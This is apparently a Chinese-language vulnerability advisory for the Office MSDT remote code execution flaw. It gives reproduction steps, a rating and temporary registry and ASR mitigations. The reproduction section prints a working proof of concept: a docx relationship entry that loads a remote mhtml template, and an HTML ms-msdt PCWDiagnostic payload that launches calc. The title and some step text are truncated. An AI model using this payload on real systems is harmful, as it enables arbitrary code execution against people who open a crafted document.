Microsoft Office MSDT 存在远程代码执行漏洞 （CVE

Microsoft Office MSDT 存在远程代码执行漏洞 （CVE

0x01 Microsoft Office

Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。

0x02 漏洞简介

该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件，该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell，禁用宏，仍能通过MSDT功能执行代码（恶意 Word 文档通常用于通过宏执行代码）。Microsoft Defender 当前无法阻止执行。受保护的视图启动无需打开文档即可运行。

0x03 漏洞复现

步骤：

1、 新建一个word 文档，在里面随便输入东西

2、 将 word 文档后缀更改为 zip

3、 将 zip 包解压打开，编辑文件夹下的 word 目录下的_rels 下的ls

4 、 按照格式加入

<Relationship  Id="rId1337" Type=" ct" Target="mhtml:localhost:80/exploit.html!x-usc:localhost:80/exploit.html" TargetMode="External"/>

5、 然后将文件夹打包成 zip，再改后缀为docx

6、 建一个文件夹作为web 站点目录，新建html 文件添加

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=?IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\localhost\c$\windows\system32\calc)/.exe"";</script>

7、 在该web站点目录下用python运行http.server服务

8、 点开改好后的word 文档即可

参照代码逻辑复现没发现什么问题，在对word 文档操作后，打开的word 文档不能调用远程模板，而用代码生成的word 文档可以调用，所以在最后一步利用了代码生成的 poc 文档，成功将其复现。

0x04 漏洞评定

• 公开程度：已发现在野利用

• 利用条件：需要打开或点击特定文件

• 漏洞危害：高危 任意代码执行

0x05 修复方案

官方修复方案：

目前微软暂未针对此漏洞发布安全补丁，提供了临时修复措施进行防护：

禁用MSDT URL协议

1、以管理员身份运行命令提示符。

2、备份注册表项后，执行命令

reg export HKEY_CLASSES_ROOTms-msdt filename

3、再执行命令

reg delete HKEY_CLASSES_ROOTms-msdt /f

撤销该禁用：

1、以管理员身份运行命令提示符。

2、备份注册表项后，执行命令

reg import filename

官方参考链接：

/

Microsoft Defender在1.367.719.0及以上版本支持此漏洞的检测和防护，Microsoft Defender for Endpoint 已为用户提供检测和警报；Microsoft365 Defender门户中的以下警报标题可以提示网络上的威胁活动：Office 应用程序的可疑行为、 的可疑行为。

其他修复方案：

1、关闭资源管理器的预览窗格，不轻易打开陌生链接或下载来历不明的文档；

2、如果您使用Microsoft Defender的 Attack Surface Reduction(ASR)规则，则可在Block模式下激活“阻止所有Office应用程序创建子进程”规则。若您还没有使用ASR规则，可先在Audit模式下运行规则，观察结果以确保不会对系统造成不利影响；

3、通过创建ASL规则防止Office产生子进程